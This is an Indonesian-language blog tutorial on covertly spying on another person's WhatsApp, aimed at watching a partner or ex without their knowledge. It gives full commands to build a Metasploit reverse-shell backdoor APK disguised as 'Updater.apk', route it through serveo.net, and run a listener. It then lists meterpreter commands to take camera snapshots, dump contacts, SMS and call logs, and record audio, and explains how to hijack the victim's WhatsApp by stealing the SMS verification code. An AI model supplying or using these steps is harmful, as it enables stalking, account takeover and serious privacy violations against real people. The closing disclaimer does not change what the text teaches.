Skip to content Skip to sidebar Skip to footer

Cara sadap WhatsApp dengan Termux socialdarknet

Sadap wa tanpa verifikasi - Whatsapp merupakan aplikasi pengirim pesan instan yang sengaja diciptakan untuk para pengguna smartphone, cara menggunakan whatsapp memang hampir sama seperti aplikasi pengirim SMS seperti biasanya. Tetapi whatsapp tidak menggunakan pulsa untuk menggunakannya, melainkan sata internet. Selama Anda terhung ke internet dan kouta data yang tersedia mencukupi, Anda bisa menggunakannya tanpa batasan sedikitpun. Sama seperti saat mengirim pesan dengan SMS, Anda juga harus menggunakan nomer ponsel sebagai alamat akun. Cara membuat akun whatsapp sangatlah mudah, Anda hanya perlu mengikuti langkah-langkah yang diberikan whatsapp pada saat membuat akun baru.


Untuk para orang tua, Anda juga boleh menyarankan kepada Anak sendiri untuk mencoba aplikasi ini. Anda tidak harus khawatir jika anak menggunakan whatsapp tanpa sepengetahuan Anda sendiri, karena saat ini sudah tersedia aplikasi yang memiliki fungsi untuk memantau pesan whatsapp dari jarak jauh. Dengan menggunakan izin dari ponsel sang anak, Anda bebas menggunakan fitur istimewa tersebut kapan saja tanpa hambatan sedikitpun. Sayangnya, Anda harus menyentuh hp target terlebih dahulu untuk memindai QR Code (Kode QR) pada ponsel target. Cara tersebut tidak akan berguna bagi Anda yang ingin melihat isi chat mantan bukan? Ya, karena cara ini akan membuat Anda ketahuan pada saat menjalankannya.

Apakah Anda membutuhkan cara menyadap wa tanpa menyentuh hp korban? Jika ya, maka Anda telah berkunjung ketempat yang benar. Dengan menggunakan tutorial yang telah kami sediakan, maka Anda akan memiliki akses pada ponsel si target tanpa harus menyentuhnya sedikit pun. Sebenarnya ada dua cara efektiv untuk memantau atau menyadap wa seseorang tanpa harus ketahuan, cara yang pertama dengan menggunakan metode pengiriman virus keylogger, sedangkan cara yang kedua hanya dengan meretas aplikasi wa-nya saja. Selain itu, ada juga beberapa alat yang akan Anda perlukan nantinya.

Pada artikel kali ini, saya akan mengungkapkan semua cara sadap wa lewat internet yang saya ketahui. Jadi, jika salah satu dari cara yang saya berikan sudah tidak berkerja lagi, maka Anda bisa menggunakan cara yang lainnya dari saya. Baiklah, berikut ini tutorialnya!

Cara sadap wa dengan *21*

Pada cara yang pertama ini, saya akan menggunakan Metasploit. Selain itu, Anda juga harus melengkapi beberapa peralatan berikut:
  • Termux Apk
  • Metasploit FrameWork (Wajib install)
  • Apk Signer untuk
Jika Anda sudah melengkapi peralatan tersebut, sekarang kita lanjutkan tutorialnya.

1. Silahkan buka aplikasi Termux Anda.

2. Install Port Forwading pada termux Anda dengan menggunakan command atau kata perintah berikut:
pkg install openssh
$ ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
3. Setelah itu, Anda harus membuka session kedua di termux untuk membuat apk backdoor dengan menggunakan perintah berikut:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > sdcard/Updater.apk
Pada tahap ini, Anda akan membuat sebuah aplikasi yang akan tersimpan secara otomatis di sdcard. Lihat sdcard Anda, dan pastikan bahwa aplikasi tersebut sudah berhasil di buat.

4. Silahkan buka aplikasi kedua untuk signin baru generate apk.

5. Masih berada pada aplikasi yang sama, silahkan cari backdoor yang telah Anda buat sebelumnya. Setelah itu, silahkan tahan pada backdoor dan pilih menu di sudut kanan atas, pilih lagi Sign dan Choose Auto.

6. Buka kembali aplikasi termux Anda dengan menggunakan session baru, dan masukkan perintah berikut:
$ msfconsole
$ mkdir -p $PREFIX/var/lib/postgresql initdb
$ $PREFIX/var/lib/postgresql
$ pg_ctl -D $PREFIX/var/lib/postgresql start
7. Silahkan tunggu selama 1 menit. Apabila telah selesai, Anda harus memasukkan kata perintah lagi berikut ini:
msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z
8. Selanjutnya install backdoor yang Anda buat sebelumnya ke perangkat Android si target.

9. Langkah terakhir masukkan kata perintah berikut:
sessions -i (Session ID)
(Session ID) = 1 , 2 , 3 , 4 or 5 ...
Sampai disini Anda sudah selesai menanamkan backdoor pada target, proses ini biasanya saya sebut sebagai proses bercocok tanam. Sekarang, aplikasi termux di android Anda akan digunakan untuk meremote android sang target. Untuk hal tersebut, silahkan gunakan kata perintah berikut ini untuk mengendalikan ponsel target dari jarak jauh.
  • webcam_snap -i 1 -p sdcard/X-Stealth-Snapshot-F.jpg (Berguna untuk memotret kamera belakang target, silahkan ubah 1 ke angka 2 untuk mengganti kamera depan).
  • dump_contacts -o sdcard/X-Contacts.txt (Gunakan untuk mengambil semua kontak si korban).
  • dump_sms -o sdcard/X-SMS.txt (Berfungsi untuk mengambil semua info SMS).
  • dump_calllog -o sdcard/X-CallLog.txt (Mengambil log aktivitas panggilan).
  • record_mic -d 10 -f sdcard/X-Spy-Record.mp3 (Merekam suara, ubah angka 10 untuk menentukan durasi).
Sampai disini kita sudah berhasil mengendalikan hp sang target, tetapi belum menyentuh aplikasi Whatsapp yang ia miliki. Saya belum merasa puas karena masih belum sampai ke akarnya. Agar terasa lebih puas, Anda harus menggunakan wa di android sendiri dengan memakai nomer si target. Caranya seperti berikut:

Cara sadap wa pacar di android tanpa root

1. Silahkan keluar dari akun wa Anda, dan masuk kembali dengan menggunakan nomer wa sang target.

2. Pada saat proses verifikasi kode, silahkan biarkan selama 1 menit.

3. Jika waktunya sudah mencapai 1 menit, Anda harus mengambil kode verifikasi SMS yang masuk pada hp korban.Nah, silahkan masukkan kata perintah berikut ini ke termux untuk mengambil SMS-nya.
dump_sms -o sdcard/SMSwhatsapp.txt
4. Jika sudah, silahkan cari dump sms di sdcard Anda. Lalu cari dan buka file yang berbentuk Txt.

5. Pada file itu terdapat kode verifikasi wa korban, silahkan salin dan masukkan di wa kamu untuk mem-verifikasi.

Selesai. Kedepannya tidak usah takut jika pacar Anda melakukan perselingkuhan, karena akan otomatis ketahuan jika menggunakan cara ini. Pada tutorial selanjutnya, mungkin kami akan memberikan tutorial cara sadap wa di cmd. Jadi, Anda harus menantikan tutorial tersebut.

Kata Penyemangat: Tidak ada sistem yang benar-benar aman, karena semuanya bisa ditembus. Dengan sebuah ketekunan dan keyakinan, Anda akan mendapatkan celah untuk menerobos masuk ke sistem tersebut layaknya seperti sang pemilik. Namun, beda cerita lagi jika Allah berkata "Tidak".

Terima kasih karena telah membaca artikel dari kami, semoga Anda terhibur. Jika mengalami masalah, silahkan tinggalkan komentar Anda. Bantu share tutorial ini guy's.

Disclaimer: Artikel ini tidak mengajarkan para pembaca untuk melakukan kegiatan kejahatan yang dapat merugikan orang lain. Semua konten di www.anonimindo.net diarahkan untuk kegiatan membantu orang lain dalam dunia internet. Kami tidak akan bertanggung jawab atas apa yang terjadi dengan Anda dan orang terdekat Anda!
Anonymous Indonesia
Anonymous Indonesia Hanya Seorang Pecandu Internet

3 comments for "Cara sadap WhatsApp dengan Termux socialdarknet"

  1. Sumpah keren ayat penyemangat nya... bang bikin group whatsaap untuk fans dong :) sumpah2 keren

    ReplyDelete
  2. Kok ga bisa ya ,yng sadap wa pacr tanpa root

    ReplyDelete